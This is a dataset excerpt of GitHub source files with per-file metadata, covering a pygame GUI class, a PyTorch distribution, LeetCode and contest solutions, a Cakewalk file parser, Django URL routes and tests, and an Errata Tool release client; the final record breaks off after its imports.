Dataset schema (one row per file):

| Column | Type | Range / values |
|---|---|---|
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 3–288 |
| content_id | string | length 40–40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k – 681M, nullable (⌀) |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes, nullable (⌀) |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50, nullable (⌀) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19, nullable (⌀) |
| gha_language | string | 147 classes, nullable (⌀) |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | string | 142 classes |
| content | string | length 128 – 8.19k |
| authors | list | length 1–1 |
| author_id | string | length 1–132 |

Records follow, one metadata line per row (columns in schema order), then the file content:
c98bf9af78911012a5d580d8fab568dc0dd4d262 | 5aa0e5f32d529c3321c28d37b0a12a8cf69cfea8 | /client/gui_lib/GUIElement.py | 9e1b3576bea5c0ed0b0177d38d061da26e549710 | [] | no_license | sheepsy90/survive | 26495f1ff2d8247fbb9470882f8be9f5272e7f2c | 0eddf637be0eacd34415761b78fc2c9d50bc1528 | refs/heads/master | 2021-01-09T05:55:16.546762 | 2017-02-03T20:15:28 | 2017-02-03T20:15:28 | 80,864,391 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,463 | py |
```python
import pygame

class GUIElement(object):
    TEXT = 2
    BUTTON = 1

    def __init__(self, name, rect):
        self.name = name
        self.x, self.y, self.width, self.height = rect
        self.is_hover = False
        self.gui_handler = None
        self.focus = False
        self.visible = True
        self.z_order = 0
        self.titleFont = pygame.font.Font('resources/fonts/VENUSRIS.ttf', 64)

    def set_zorder(self, order):
        self.z_order = order

    def get_zorder(self):
        return self.z_order

    def get_name(self):
        return self.name

    def set_hover_state(self, mx, my):
        if self.x <= mx <= self.width+self.x and self.y <= my <= self.height+self.y:
            self.is_hover = True
        else:
            self.is_hover = False

    def update(self, mx, my, mouse_buttons, events):
        self.set_hover_state(mx, my)

    def get_rect(self):
        return pygame.Rect(self.x, self.y, self.width, self.height)

    def is_hover_active(self):
        return self.is_hover

    def draw(self, renderer):
        raise NotImplementedError

    def register_gui_handler(self, gui_handler):
        self.gui_handler = gui_handler

    def enable_focus(self):
        self.focus = True

    def disable_focus(self):
        self.focus = False

    def has_focus(self):
        return self.focus

    def set_visible(self, value):
        self.visible = value

    def is_visible(self):
        return self.visible
```
| ["[email protected]"] | |
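`GUIElement.draw` raises `NotImplementedError`, so concrete widgets are expected to subclass it. A minimal sketch of such a subclass (the `Label` class and its renderer usage are illustrative assumptions, not code from the sheepsy90/survive repo):

```python
# Hypothetical subclass sketch -- Label is not part of the original repo.
class Label(GUIElement):
    def __init__(self, name, rect, text):
        super(Label, self).__init__(name, rect)
        self.text = text

    def draw(self, renderer):
        # Render the label text at the element's position using the
        # titleFont loaded in GUIElement.__init__.
        surface = self.titleFont.render(self.text, True, (255, 255, 255))
        renderer.blit(surface, (self.x, self.y))
```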
8bab37daf96d71aa280e74d681d7515f1291bf03 | c9f67529e10eb85195126cfa9ada2e80a834d373 | /lib/python3.5/site-packages/torch/distributions/geometric.py | 1e4b121cd7b4cfcccd548bf86ff634e3392b7ebe | ["Apache-2.0"] | permissive | chilung/dllab-5-1-ngraph | 10d6df73ea421bfaf998e73e514972d0cbe5be13 | 2af28db42d9dc2586396b6f38d02977cac0902a6 | refs/heads/master | 2022-12-17T19:14:46.848661 | 2019-01-14T12:27:07 | 2019-01-14T12:27:07 | 165,513,937 | 0 | 1 | Apache-2.0 | 2022-12-08T04:59:31 | 2019-01-13T14:19:16 | Python | UTF-8 | Python | false | false | 2,923 | py |
```python
from numbers import Number

import torch
from torch.distributions import constraints
from torch.distributions.distribution import Distribution
from torch.distributions.utils import broadcast_all, probs_to_logits, logits_to_probs, lazy_property, _finfo
from torch.nn.functional import binary_cross_entropy_with_logits


class Geometric(Distribution):
    r"""
    Creates a Geometric distribution parameterized by `probs`, where `probs` is the probability
    of success of Bernoulli trials. It represents the probability that in k + 1 Bernoulli
    trials, the first k trials fail before a success is seen.

    Samples are non-negative integers [0, inf).

    Example::

        >>> m = Geometric(torch.tensor([0.3]))
        >>> m.sample()  # underlying Bernoulli has 30% chance 1; 70% chance 0
         2
        [torch.FloatTensor of size 1]

    Args:
        probs (Number, Tensor): the probability of sampling `1`. Must be in range (0, 1]
        logits (Number, Tensor): the log-odds of sampling `1`.
    """
    arg_constraints = {'probs': constraints.unit_interval}
    support = constraints.nonnegative_integer

    def __init__(self, probs=None, logits=None, validate_args=None):
        if (probs is None) == (logits is None):
            raise ValueError("Either `probs` or `logits` must be specified, but not both.")
        if probs is not None:
            self.probs, = broadcast_all(probs)
            if not self.probs.gt(0).all():
                raise ValueError('All elements of probs must be greater than 0')
        else:
            self.logits, = broadcast_all(logits)
        probs_or_logits = probs if probs is not None else logits
        if isinstance(probs_or_logits, Number):
            batch_shape = torch.Size()
        else:
            batch_shape = probs_or_logits.size()
        super(Geometric, self).__init__(batch_shape, validate_args=validate_args)

    @property
    def mean(self):
        return 1. / self.probs - 1.

    @property
    def variance(self):
        return (1. / self.probs - 1.) / self.probs

    @lazy_property
    def logits(self):
        return probs_to_logits(self.probs, is_binary=True)

    @lazy_property
    def probs(self):
        return logits_to_probs(self.logits, is_binary=True)

    def sample(self, sample_shape=torch.Size()):
        shape = self._extended_shape(sample_shape)
        with torch.no_grad():
            u = self.probs.new(shape).uniform_(_finfo(self.probs).tiny, 1)
            return (u.log() / (-self.probs).log1p()).floor()

    def log_prob(self, value):
        if self._validate_args:
            self._validate_sample(value)
        value, probs = broadcast_all(value, self.probs.clone())
        probs[(probs == 1) & (value == 0)] = 0
        return value * (-probs).log1p() + self.probs.log()

    def entropy(self):
        return binary_cross_entropy_with_logits(self.logits, self.probs, reduce=False) / self.probs
```
| ["[email protected]"] | |
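A short usage sketch for the class above (illustrative values; the printed samples vary run to run):

```python
import torch
from torch.distributions import Geometric

m = Geometric(torch.tensor([0.3]))       # P(success) = 0.3 per trial
x = m.sample((5,))                       # shape (5, 1): five draws of failures-before-success
print(x)                                 # e.g. tensor([[0.], [2.], [1.], [0.], [4.]])
print(m.mean)                            # 1/0.3 - 1 = tensor([2.3333])
print(m.log_prob(torch.tensor([2.])))    # log(0.7**2 * 0.3)
```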
3387a7b1ab5c092a4be3f73958c4f37a2aec6a5c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02683/s728076842.py | 530d406c4a8a8bf681c980d60d4d26bc44d72770 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py |
```python
import numpy as np

n, m, x = map(int, input().split())
a = 2**64
b = [np.array(list(map(int, input().split())), "i8") for i in range(n)]
for i in range(2**n):
    c = bin(i)[2:]
    c = "0"*(n-len(c)) + c
    l = np.zeros(m)
    q = 0
    for j in range(n):
        if c[j] == "1":
            q += b[j][0]
            l += b[j][1:]
    if np.min(l) >= x:
        a = min(a, q)
if a == 2**64:
    print(-1)
else:
    print(a)
```
| ["[email protected]"] | |
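The loop above brute-forces all 2^n subsets with an n-bit mask: `q` accumulates the cost column, `l` the m skill columns, and `a` tracks the cheapest subset whose weakest skill reaches `x`. An equivalent, more explicit sketch with `itertools` (function and variable names are mine, not from the original submission):

```python
from itertools import combinations

def min_cost(books, m, x):
    # books: rows of (cost, skill_1, ..., skill_m); same O(2^n * m) idea.
    best = None
    for r in range(len(books) + 1):
        for chosen in combinations(books, r):
            skills = [sum(b[k] for b in chosen) for k in range(1, m + 1)]
            if all(s >= x for s in skills):
                cost = sum(b[0] for b in chosen)
                best = cost if best is None else min(best, cost)
    return -1 if best is None else best
```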
6aaba7d662a21da85d2ba3e6b178f7ecf8d58cd2 | e7b07f173a8bc0d36e046c15df7bbe3d18d49a33 | /parse.py | 9d1894ef9159fb1b51738dbba15b24d5bcb61bc0 | [] | no_license | jcarbaugh/makeitwrk | 82b6e8079b118e8d668b2e6858096a54da33d5a8 | 83801b19c120b4cf728b8342c4933fefe54b54d8 | refs/heads/master | 2020-04-06T04:55:56.785930 | 2011-08-26T19:09:27 | 2011-08-26T19:09:27 | 2,275,931 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,029 | py |
```python
#!/usr/bin/env python
from struct import pack, unpack
import sys

CHUNK_TYPES = {
    1: 'TRACK_CHUNK',
    2: 'STREAM_CHUNK',
    4: 'METER_CHUNK',
    5: 'TEMPO_CHUNK',
    6: 'SYSEX_CHUNK',
    7: 'MEMRGN_CHUNK',
    10: 'TIMEBASE_CHUNK',
    # variables
    3: 'VARS_CHUNK',
    26: 'VARS_CHUNK_VAR',
    # device stuff
    33: 'DEVICES',
    # track stuff?
    36: 'TRACK_NAME?',
    54: 'TRACK_PORT',
    45: 'TRACK_DATA?',
    255: 'END_CHUNK',
}

def solomon(arr, parts):
    for i in range(0, parts * 8, 8):
        yield arr[i:i+8]

def chunk_reader(wrkfile):
    if wrkfile.read(8) != b'CAKEWALK':
        raise ValueError('invalid file format')

    wrkfile.read(1)  # byte I don't care about

    mm_version = wrkfile.read(2)
    major = mm_version[1]  # indexing bytes already yields an int on Python 3
    minor = mm_version[0]
    version = "%i.%i" % (major, minor)
    yield ('VERSION_CHUNK', 2, None, version)

    while 1:
        ch_type_data = wrkfile.read(1)[0]
        ch_type = CHUNK_TYPES.get(ch_type_data, ch_type_data)
        if ch_type == 'END_CHUNK':
            break
        ch_len = unpack('i', wrkfile.read(4))[0]
        ch_data_offset = wrkfile.tell()
        #print(ch_data_offset)
        ch_data = wrkfile.read(ch_len)
        yield (ch_type, ch_len, ch_data)

    yield ('END_CHUNK', None, None, None)
    wrkfile.close()

if __name__ == '__main__':
    # read the binary stream so the b'CAKEWALK' comparison works on Python 3
    for chunk in chunk_reader(sys.stdin.buffer):
        print(chunk)
        # if chunk[0] == 'TRACK_NAME?':
        #     (tnum, tname_len) = unpack('HB', chunk[2][:3])
        #     tname = chunk[2][3:3+tname_len].decode('utf-8')
        #     print("[%02i] %s" % (tnum, tname))
        # elif chunk[0] == 'TRACK_DATA?':
        #     (tnum, schunks) = unpack('=HxH', chunk[2][:5])
        #     print(' ', '------------')
        #     for s in solomon(chunk[2][7:], schunks):
        #         print(' ', unpack('8B', s))

"""
__TRACK_DATA__
#2 ?? CNT- ???? 16---------------
0900 00 0700 0000 B649 009023641E00 D449 009028643C00 104A 00902B643C00 4C4A 009029643C00 884A 009023641E00 A64A 009023641E00 E24A 009023641E00
0900 00 0700 0000 1E4B 009023641E00 3C4B 009028643C00 784B 00902B643C00 B44B 009029643C00 F04B 009023641E00 0E4C 009023641E00 4A4C 009023641E00
(30, 75, 0, 144, 35, 100, 30, 0)
 submeasure . . . .
 measure. . . .
 ? . . . .
 ? . . .
 nt? . .
 ? .
 -----?
------------------------------------
0000 00 0800 0000 E010 009045643C00 1C11 009045643C00 5811 00904C643C00 9411 009045643C00 D011 00904D643C00 0C12 00904C643C00 4812 009048643C00 8412 009045643C00
0200 00 1400 0000 8016 00902664E001 3417 009026643C00 7017 009026647800 E817 009026647800 2418 009026643C00 6018 00902264E001 1419 009022643C00 5019 009022647800 C819 009022647800041A009022643C00401A00901F64E001F41A00901F643C00301B00901F647800A81B00901F647800E41B00901F643C00201C00902164E001D41C009021643C00101D009021647800881D009021647800C41D009021643C00

__TRACK_NAME__
#2 L2 NAME* INSTRUMENT?
0000 05 4F7267616E FFFF 1500 FFFFFFFF 00000000000000 0A 0000000000
        O R G A N
0100 0B 536C617020426173732031 FFFF 2500 FFFFFFFF 00000000000000 0A 0000010000
        S L A P B A S S 1
0200 0B 536C617020426173732032 FFFF 2400 FFFFFFFF 00000000000000 FE 0000020000
        S L A P B A S S 2
0300 0C 4869676820537472696E6773 FFFF 2C00 FFFFFFFF 00000000000000 0A 0000030000
        H I G H S T R I N G S
0900 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
        D R U M S
-------------------------------------------
0000 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
        D R U M S
"""
```
| ["[email protected]"] | |
602bf5ff185fae424574e01f0d60bafdc9fad426 | 9d032e9864ebda8351e98ee7950c34ce5168b3b6 | /301.py | 10f8978082ea2c4ee7bbac60f631a00e920d68cf | [] | no_license | snpushpi/P_solving | e0daa4809c2a3612ba14d7bff49befa7e0fe252b | 9980f32878a50c6838613d71a8ee02f492c2ce2c | refs/heads/master | 2022-11-30T15:09:47.890519 | 2020-08-16T02:32:49 | 2020-08-16T02:32:49 | 275,273,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py |
```python
'''
Remove the minimum number of invalid parentheses in order to make the input string valid. Return all possible results.
Note: The input string may contain letters other than the parentheses ( and ).

Example 1:
Input: "()())()"
Output: ["()()()", "(())()"]

Example 2:
Input: "(a)())()"
Output: ["(a)()()", "(a())()"]

Example 3:
Input: ")("
Output: [""]
'''
def validstring(string):
    count = 0
    for char in string:
        if char == '(':
            count += 1
        elif char == ')':
            count -= 1
        if count < 0:
            return False
    return (count == 0)

def main(input_string):
    l = len(input_string)
    queue = [input_string]
    visited = set()
    visited.add(input_string)
    level = False
    result = []
    while queue:
        new_str = queue.pop(0)
        if validstring(new_str):
            result.append(new_str)
            level = True
        if level:
            continue
        for i in range(len(new_str)):
            if not (new_str[i] == ')' or new_str[i] == '('):
                continue
            part_string = new_str[:i] + new_str[i+1:]
            if part_string not in visited:
                visited.add(part_string)
                queue.append(part_string)
    return result

print(main("()())()"))
```
| ["[email protected]"] | |
0285e95057b21742ade89d9041421eb988eb90fb | d79c152d072edd6631e22f886c8beaafe45aab04 | /nicolock/products/rest_urls.py | d58d9a92a31372b447067ee3dd7508ef1d810182 | [] | no_license | kabroncelli/Nicolock | 764364de8aa146721b2678c14be808a452d7a363 | 4c4343a9117b7eba8cf1daf7241de549b9a1be3b | refs/heads/master | 2020-03-11T11:02:43.074373 | 2018-04-18T17:38:33 | 2018-04-18T17:38:33 | 129,959,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py |
```python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals

from django.conf.urls import url

from . import rest_views as views

urlpatterns = [
    url(
        regex=r'^products/(?P<pk>\d+)/$',
        view=views.ProductDetail.as_view(),
        name='product-detail'
    ),
    url(
        regex=r'^products/(?P<pk>\d+)/like/$',
        view=views.ProductLike.as_view(),
        name='product-like'
    ),
    url(
        regex=r'^categories/$',
        view=views.CategoryList.as_view(),
        name='category-list'
    ),
    url(
        regex=r'^categories/(?P<pk>\d+)/$',
        view=views.CategoryDetail.as_view(),
        name='category-detail'
    ),
]
```
| ["[email protected]"] | |
d3527c75633bd397f54893cab6262bed50e53879 | d17d65a3ee48b307a46a0b95a05f04131668edbe | /TestSuite/runner.py | 6a172fc2702d50f5b6f0558a2beab1d4f677a319 | [] | no_license | qlcfj001/ui_test | 28fa370a6f912b2ff9a551c681d35a452c57ee02 | 25020af19d84c9c2b1bad02aca89cc881e828bbb | refs/heads/master | 2023-06-15T18:10:02.177702 | 2021-07-15T06:35:10 | 2021-07-15T06:35:10 | 386,012,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py |
```python
from Page.Base import base
from pageobjct.SearcH import Searchpage
from selenium.webdriver.common.by import By
#from TestSuite.Variablelayer.Variable import *
import time
import unittest

leave = '成都'
leave_data = "2021-07-20"
arrive = '北京'
arrive_data = '2021-07-30'

aa = Searchpage()
aa.search7(leave='成都', leave_data="2021-07-20", arrive='北京', arrive_data='2021-07-30')
```
| ["[email protected]"] | |
06d3b8b17c46a0ae3faf7387123f73c73bea8d78 | 4766d241bbc736e070f79a6ae6a919a8b8bb442d | /20200215Python-China/0094. Binary Tree Inorder Traversal.py | 08893a77b8777c433e17edf90f755b8b4b58c958 | [] | no_license | yangzongwu/leetcode | f7a747668b0b5606050e8a8778cc25902dd9509b | 01f2edd79a1e922bfefecad69e5f2e1ff3a479e5 | refs/heads/master | 2021-07-08T06:45:16.218954 | 2020-07-18T10:20:24 | 2020-07-18T10:20:24 | 165,957,437 | 10 | 8 | null | null | null | null | UTF-8 | Python | false | false | 733 | py |
```python
'''
Given a binary tree, return the inorder traversal of its nodes' values.

Example:
Input: [1,null,2,3]
   1
    \
     2
    /
   3
Output: [1,3,2]

Follow up: Recursive solution is trivial, could you do it iteratively?
'''
# Definition for a binary tree node.
# class TreeNode:
#     def __init__(self, x):
#         self.val = x
#         self.left = None
#         self.right = None

class Solution:
    def inorderTraversal(self, root: TreeNode) -> List[int]:
        rep = []
        self.getInOrderTra(root, rep)
        return rep

    def getInOrderTra(self, root, rep):
        if not root:
            return
        self.getInOrderTra(root.left, rep)
        rep.append(root.val)
        self.getInOrderTra(root.right, rep)
```
| ["[email protected]"] | |
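The docstring's follow-up asks for an iterative traversal; a stack-based sketch (my addition, not part of the original submission):

```python
class SolutionIterative:
    def inorderTraversal(self, root):
        rep, stack, node = [], [], root
        while node or stack:
            while node:            # walk left, deferring nodes on the stack
                stack.append(node)
                node = node.left
            node = stack.pop()     # leftmost unvisited node
            rep.append(node.val)
            node = node.right      # then traverse its right subtree
        return rep
```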
552fea4e7e4a404550ffa6236bc4c30f22f33e18 | 3f9f7c73bb2f9da31c586d2b64e2cc94f35239dc | /django-polls/polls/tests/test_models.py | 94b7c24fbee98fcaf5c51ee69dd5ad670600b45b | ["MIT"] | permissive | jsterling23/DPY_Refresher | eb57e37d4bbad14143800719668b990b459fb56d | 4646b7ebd79ba853f5ccc172183f41257cc12b60 | refs/heads/master | 2020-03-23T19:11:32.626731 | 2018-07-29T01:17:49 | 2018-07-29T01:17:49 | 141,959,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,141 | py |
```python
from django.test import TestCase
import datetime
from django.utils import timezone
from ..models import Question
from django.urls import reverse

class QuestionModelTests(TestCase):

    def test_was_published_recently_with_future_question(self):
        # method should return False for future dated questions.
        time = timezone.now() + datetime.timedelta(days=1, seconds=1)
        future_question = Question(pub_date=time)
        self.assertIs(future_question.was_published_recently(), False)

    def test_was_published_recently_with_past_question(self):
        # method should return False for past dated questions.
        time = timezone.now() - datetime.timedelta(days=1, seconds=1)
        past_question = Question(pub_date=time)
        self.assertIs(past_question.was_published_recently(), False)

    def test_was_published_recently_with_current_question(self):
        # should return True for current question
        time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)
        current_question = Question(pub_date=time)
        self.assertIs(current_question.was_published_recently(), True)
```
| ["[email protected]"] | |
e5fefc6b8e0ec0d00e467d6808038193d92e8aa7 | 683b73e0c95c755a08e019529aed3ff1a8eb30f8 | /machina/apps/forum_moderation/__init__.py | f1911a14dbd6195e896b647fa949fa08a0c6abce | ["BSD-3-Clause"] | permissive | DrJackilD/django-machina | b3a7be9da22afd457162e0f5a147a7ed5802ade4 | 76858921f2cd247f3c1faf4dc0d9a85ea99be3e1 | refs/heads/master | 2020-12-26T08:19:09.838794 | 2016-03-11T03:55:25 | 2016-03-11T03:55:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py |
```python
# -*- coding: utf-8 -*-

# Standard library imports
# Third party imports
# Local application / specific library imports

default_app_config = 'machina.apps.forum_moderation.registry_config.ModerationRegistryConfig'
```
| ["[email protected]"] | |
c7ebc6f32e1358ed20f23dc25b3df7d6a66daf88 | 4aeaca4c58858125e844aad1cd988182201b5120 | /crane/files/timeHistoryParser.py | be957dd91e6668776b4c071a376eeffa2a646763 | [] | no_license | tkarna/crane | f18442a010af0909b7f5af9358cf9080ca1dd1e4 | b8313d0373d8206685d81aadccc425e432c6a010 | refs/heads/master | 2020-05-21T23:39:07.707777 | 2017-11-16T15:58:14 | 2017-11-16T15:58:14 | 53,163,424 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,357 | py |
"""
Read SELFE time history (.th) files to a data container.
Jesse Lopez - 2016-04-15
"""
import datetime
import argparse
import numpy as np
from crane.data import timeArray
from crane.data import dataContainer
class thParser(object):
def __init__(self, filename, start_time):
self.filename = filename
self.start_date = start_time
self.time = None
self.data = None
def readFile(self):
"""Read time history file."""
th = np.loadtxt(self.filename)
self.time = timeArray.simulationToEpochTime(th[:, 0], self.start_date)
self.data = th[:, 1]
def genDataContainer(self, variable='variable', station='bvao',
depth='0', bracket='A', save=False):
"""Generate data container."""
x = y = z = 0
coordSys = ''
meta = {}
meta['tag'] = 'timeHistory'
meta['variable'] = variable
meta['location'] = station
meta['msldepth'] = depth
meta['bracket'] = bracket
dc = dataContainer.dataContainer.fromTimeSeries(
self.time, self.data, fieldNames=[variable],
x=x, y=y, z=z, timeFormat='epoch', coordSys=coordSys,
metaData=meta)
if save:
fname = './'+station+'_'+variable+'_'+'0'+'_'+self.start_date.strftime('%Y-%m-%d')+'.nc'
print fname
dc.saveAsNetCDF(fname)
return dc
def parseCommandLine():
parser = argparse.ArgumentParser(description='Read time history to dataContainer.')
parser.add_argument('filepath', type=str, help='Path to time history file.')
parser.add_argument('starttime', type=str, help='Start time of simulation YYYY-MM-DD')
parser.add_argument('variable', type=str, help='Variable name (e.g. - salinity, temp, turbidity)')
parser.add_argument('station', type=str, help='Station name (e.g. - saturn01, tpoin)')
parser.add_argument('depth', type=str, help='Station depth (e.g. - 0.1, 4.0)')
parser.add_argument('bracket', type=str, help='Bracket (e.g. - F, A, R)')
args = parser.parse_args()
st = datetime.datetime.strptime(args.starttime, '%Y-%m-%d')
th = thParser(args.filepath, st)
th.readFile()
th.genDataContainer(args.variable, args.station, args.depth, args.bracket, True)
if __name__ == '__main__':
parseCommandLine()
| ["[email protected]"] | |
075c8636339cb3b08aa5c4c3815994408a005e38 | 853d7bd91f4ba254fba0ff28f2e0a3eb2b74fa48 | /errata_tool/release.py | b5c1211cb9a8c86556c758725ad9297bc11a9fbb | ["MIT"] | permissive | smunilla/errata-tool | b07614daeceda4a1bfc18ce59679be0a93bb084f | 91bdfb17f15308b46298210fbb2fe5af786276bc | refs/heads/master | 2020-04-10T00:18:12.471123 | 2018-11-19T17:33:02 | 2018-11-28T15:40:08 | 160,681,680 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,800 | py |
```python
from __future__ import print_function
import sys
from datetime import date
from errata_tool import ErrataConnector
from errata_tool.product import Product
from errata_tool.product_version import ProductVersion
from errata_tool.user import User


class NoReleaseFoundError(Exception):
    pass


class MultipleReleasesFoundError(Exception):
    pass


class ReleaseCreationError(Exception):
    pass


class Release(ErrataConnector):

    def __init__(self, **kwargs):
        if 'id' not in kwargs and 'name' not in kwargs:
            raise ValueError('missing release "id" or "name" kwarg')
        self.id = kwargs.get('id')
        self.name = kwargs.get('name')
        self.refresh()

    def refresh(self):
        url = self._url + '/api/v1/releases?'
        if self.id is not None:
            url += 'filter[id]=%s' % self.id
        elif self.name is not None:
            url += 'filter[name]=%s' % self.name
        result = self._get(url)
        if len(result['data']) < 1:
            raise NoReleaseFoundError()
        if len(result['data']) > 1:
            # it's possible to accidentally have identically named releases,
            # see engineering RT 461783
            raise MultipleReleasesFoundError()
        self.data = result['data'][0]
        self.id = self.data['id']
        self.name = self.data['attributes']['name']
        self.description = self.data['attributes']['description']
        self.type = self.data['attributes']['type']
        self.is_active = self.data['attributes']['is_active']
        self.enabled = self.data['attributes']['enabled']
        self.blocker_flags = self.data['attributes']['blocker_flags']
        self.is_pdc = self.data['attributes']['is_pdc']
        self.product_versions = self.data['relationships']['product_versions']
        self.url = self._url + '/release/show/%d' % self.id
        # For displaying in scripts/logs:
        self.edit_url = self._url + '/release/edit/%d' % self.id

    def advisories(self):
        """
        Find all advisories for this release.

        :returns: a list of dicts, one per advisory.
                  For example:
                  [{
                      "id": 32972,
                      "advisory_name": "RHSA-2018:0546",
                      "product": "Red Hat Ceph Storage",
                      "release": "rhceph-3.0",
                      "synopsis": "Important: ceph security update",
                      "release_date": None,
                      "qe_owner": "[email protected]",
                      "qe_group": "RHC (Ceph) QE",
                      "status": "SHIPPED_LIVE",
                      "status_time": "March 15, 2018 18:29"
                  }]
        """
        url = '/release/%d/advisories.json' % self.id
        return self._get(url)

    @classmethod
    def create(klass, name, product, product_versions, type, program_manager,
               default_brew_tag, blocker_flags, ship_date=None):
        """
        Create a new release in the ET.

        See https://bugzilla.redhat.com/1401608 for background.

        Note this method enforces certain conventions:

        * Always disables PDC for a release
        * Always creates the releases as "enabled"
        * Always allows multiple advisories per package
        * Description is always the combination of the product's own
          description (for example "Red Hat Ceph Storage") with the number
          from the latter part of the release's name. So a new "rhceph-3.0"
          release will have a description "Red Hat Ceph Storage 3.0".

        :param name: short name for this release, eg "rhceph-3.0"
        :param product: short name, eg. "RHCEPH".
        :param product_versions: list of names, eg. ["RHEL-7-CEPH-3"]
        :param type: "Zstream" or "QuarterlyUpdate"
        :param program_manager: for example "anharris" (Drew Harris, Ceph PgM)
        :param default_brew_tag: for example "ceph-3.0-rhel-7-candidate"
        :param blocker_flags: for example, "ceph-3.0"
        :param ship_date: date formatted as strftime("%Y-%b-%d"). For example,
                          "2017-Nov-17". If omitted, the ship_date will
                          be set to today's date. (This can always be updated
                          later to match the ship date value in Product
                          Pages.)
        """
        product = Product(product)
        (_, number) = name.split('-', 1)
        description = '%s %s' % (product.description, number)
        program_manager = User(program_manager)

        product_version_ids = set([])
        for pv_name in product_versions:
            pv = ProductVersion(pv_name)
            product_version_ids.add(pv.id)

        if ship_date is None:
            today = date.today()
            ship_date = today.strftime("%Y-%b-%d")

        et = ErrataConnector()
        url = et._url + '/release/create'
        payload = {
            'type': type,
            'release[allow_blocker]': 0,
            'release[allow_exception]': 0,
            'release[allow_pkg_dupes]': 1,
            'release[allow_shadow]': 0,
            'release[blocker_flags]': blocker_flags,
            'release[default_brew_tag]': default_brew_tag,
            'release[description]': description,
            'release[enable_batching]': 0,
            'release[enabled]': 1,
            'release[is_deferred]': 0,
            'release[is_pdc]': 0,
            'release[name]': name,
            'release[product_id]': product.id,
            'release[product_version_ids][]': product_version_ids,
            'release[program_manager_id]': program_manager.id,
            'release[ship_date]': ship_date,
            'release[type]': type,
        }
        result = et._post(url, data=payload)
        if (sys.version_info > (3, 0)):
            body = result.text
        else:
            # Found during live testing:
            # UnicodeEncodeError: 'ascii' codec can't encode character u'\xe1'
            # in position 44306: ordinal not in range(128)
            # Not sure why there was a non-ascii character in the ET's HTTP
            # response, but this fixes it.
            body = result.text.encode('utf-8')
        if result.status_code != 200:
            # help with debugging:
            print(body)
            result.raise_for_status()
        # We can get a 200 HTTP status_code here even when the POST failed to
        # create the release in the ET database. (This happens, for example, if
        # there are no Approved Components defined in Bugzilla for the release
        # flag, and the ET hits Bugzilla's XMLRPC::FaultException.)
        if 'field_errors' in body:
            print(body)
            raise ReleaseCreationError('see field_errors <div>')
        return klass(name=name)
```
| ["[email protected]"] | |
b9470a6364fcb617b3b2bbeb23ef97dce22221d7 | de6fb3a55196b6bd36a4fda0e08ad658679fb7a1 | /optin_manager/src/python/openflow/common/utils/formfields.py | adec249dc39015d89a6d299354718c9fd0f8e896 | ["BSD-3-Clause", "Apache-2.0"] | permissive | dana-i2cat/felix | 4a87af639e4c7db686bfa03f1ae4ce62711615e3 | 059ed2b3308bda2af5e1942dc9967e6573dd6a53 | refs/heads/master | 2021-01-02T23:12:43.840754 | 2016-02-04T10:04:24 | 2016-02-04T10:04:24 | 17,132,912 | 4 | 4 | null | null | null | null | UTF-8 | Python | false | false | 388 | py |
```python
'''
Created on Jul 17, 2010

@author: jnaous
'''
from django import forms
from expedient.common.utils import validators

class MACAddressField(forms.CharField):
    """
    A MAC Address form field.
    """
    default_error_messages = {
        'invalid': u'Enter a valid MAC address in "xx:xx:xx:xx:xx:xx" format.',
    }
    default_validators = [validators.validate_mac_address]
```
| ["[email protected]"] | |
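A minimal usage sketch for the field above (the `InterfaceForm` is hypothetical and assumes `expedient`'s validators are importable):

```python
from django import forms

class InterfaceForm(forms.Form):
    # Hypothetical form using MACAddressField; label text is illustrative.
    mac = MACAddressField(label="MAC address")

form = InterfaceForm(data={"mac": "00:11:22:33:44:55"})
print(form.is_valid())  # True if validate_mac_address accepts the value
```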
22214c4cf02d9139ebf68302682f68b55190d51e | 3a7adfdcf7a5048045c8e95a93369a1796cfd532 | /conftest.py | 377ddc7028f2964dd5cf5621a68dc74e7967e513 | ["BSD-3-Clause"] | permissive | theGreenJedi/nixpy | e06025077d5d224a7d051532ebfbd48845339c58 | 40b5ecdaa9b074c7bf73137d1a94cb84fcbae5be | refs/heads/master | 2022-02-01T15:14:22.133157 | 2019-06-03T09:10:57 | 2019-06-03T09:10:57 | 197,896,640 | 1 | 0 | null | 2019-07-20T07:37:03 | 2019-07-20T07:37:02 | null | UTF-8 | Python | false | false | 808 | py |
```python
import pytest
import tempfile
